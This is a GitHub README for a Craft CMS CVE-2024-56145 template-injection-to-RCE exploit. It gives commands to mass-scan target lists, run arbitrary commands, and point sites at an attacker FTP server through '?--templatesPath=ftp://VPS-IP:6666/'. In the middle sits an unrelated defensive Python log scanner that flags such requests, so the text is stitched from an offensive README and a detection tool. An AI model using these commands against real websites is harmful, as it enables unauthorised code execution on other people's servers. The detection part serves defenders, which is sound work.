Sachinart/CVE-2024-56145-craftcms-rce

Before you run the script again, run:

```
fuser -k 6666/tcp
```

Usage:

```
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
```

A custom command can be used like this:

```
python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
```

`-i` is your IP or your VPS IP (find it with `ipconfig` / `ifconfig`).

For example:

```
python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
```

Manual exploit: run poc.py as above against the targets you have; you will see an output file with the vulnerable targets.

Now what? You have a vulnerable target but want to play more? So I have added poc2.py, which is for manual testing against the target. How to do that? First run `fuser -k 6666/tcp`, then:

1. Run poc2.py (port 6666 started as FTP).
2. Open in the browser: `yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/`
3. You will see:

[image]

Written By Chirag Artani (https://x.com/Chirag99Artani)
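For defenders, the request shape in step 2 is easy to spot in web server logs. The following is an added example, not part of this repository: it flags requests whose query string carries a `--option` key such as `--templatesPath` and records whether the value is a remote URL. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request target inside a combined-format access log line (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Query key shaped like a command-line option, e.g. --templatesPath.
OPTION = re.compile(r"^--([A-Za-z][\w-]*)$")
# Value that points at a URL (ftp://, http://, ...).
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)://")

def decode(text, rounds=3):
    """Percent-decode until stable so %2D%2D and %252D%252D are also seen."""
    for _ in range(rounds):
        once = unquote(text)
        if once == text:
            break
        text = once
    return text

def inspect_line(line):
    """Return a list of findings (dicts) for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    # '&' separates pairs; '+' stands for a space, so split on it as well.
    for pair in re.split(r"[&+]", query):
        key, _, value = decode(pair).partition("=")
        opt = OPTION.match(key.strip())
        if opt:
            scheme = SCHEME.match(value)
            findings.append({"client": line.split(" ", 1)[0],
                             "option": opt.group(1), "value": value,
                             "remote_scheme": scheme.group(1).lower() if scheme else None})
    return findings

def scan(lines):
    """Inspect every line and return all findings in order."""
    return [f for line in lines for f in inspect_line(line)]

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.10 - - [01/Jan/2025:10:00:00 +0000] "GET /?--templatesPath=ftp://198.51.100.7:6666/ HTTP/1.1" 200 512',
    '203.0.113.11 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?%2D%2DtemplatesPath=ftp%3A%2F%2F198.51.100.7%3A6666%2F HTTP/1.1" 200 512',
    '203.0.113.12 - - [01/Jan/2025:10:00:09 +0000] "GET /search?q=a--b&page=2 HTTP/1.1" 200 900',
    '203.0.113.13 - - [01/Jan/2025:10:00:12 +0000] "GET /?p=1+--someOption=local/dir HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings with a non-empty `remote_scheme` deserve the closest look, since they match the remote template path pattern shown in step 2.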

About

CVE-2024-56145 SSTI to RCE - twig templates
